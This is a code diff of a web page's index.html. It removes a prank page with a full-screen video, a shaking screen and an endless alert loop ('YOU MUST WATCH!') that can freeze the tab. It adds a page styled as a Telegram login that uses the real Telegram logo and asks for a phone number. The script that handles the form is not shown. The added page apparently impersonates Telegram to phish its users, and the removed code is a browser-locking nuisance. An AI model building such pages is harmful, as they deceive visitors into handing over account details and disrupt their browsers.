--- a/index.html
+++ b/index.html
@@ -1,50 +1,24 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8">
-  <title>Warning!</title>
-  <style>
-    html, body {
-      margin: 0;
-      padding: 0;
-      background: black;
-      overflow: hidden;
-    }
-    video {
-      position: fixed;
-      top: 0; left: 0;
-      width: 100vw;
-      height: 100vh;
-      object-fit: cover;
-    }
-    .shake {
-      animation: shake 0.1s infinite;
-    }
-    @keyframes shake {
-      0% { transform: translate(1px, 1px) rotate(0deg); }
-      20% { transform: translate(-1px, -2px) rotate(-1deg); }
-      40% { transform: translate(-3px, 0px) rotate(1deg); }
-      60% { transform: translate(3px, 2px) rotate(0deg); }
-      80% { transform: translate(1px, -1px) rotate(1deg); }
-      100% { transform: translate(-1px, 2px) rotate(-1deg); }
-    }
-  </style>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Telegram - Login</title>
+    <link rel="stylesheet" href="style.css">
 </head>
 <body>
-  <video id="scaryVideo" autoplay muted loop></video>
+    <div class="login-container">
+        <div class="logo">
+            <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/6/6e/Telegram_logo.svg/512px-Telegram_logo.svg.png" alt="Telegram Logo" />
+        </div>
+        <h1>Welcome to Telegram</h1>
+        <p>Enter your phone number to sign in</p>
+        <form id="loginForm">
+            <input type="text" id="phoneNumber" placeholder="Phone number" required><br>
+            <button type="submit">Next</button>
+        </form>
+    </div>
 
-  <script>
-    const video = document.getElementById('scaryVideo');
-    // Указываем ссылку на видео (можно использовать свой файл или ссылку с YouTube)
-    video.src = "https://www.w3schools.com/html/movie.mp4"; // Замени на URL твоего видео
-    video.muted = false; // Для звука, если нужно
-
-    document.body.classList.add('shake');
-
-    // Optional: бесконечный alert (может зависнуть вкладка)
-    setInterval(() => {
-      alert("ВЫ ДОЛЖНЫ СМОТРЕТЬ!");
-    }, 1000);
-  </script>
+    <script src="script.js"></script>
 </body>
 </html>
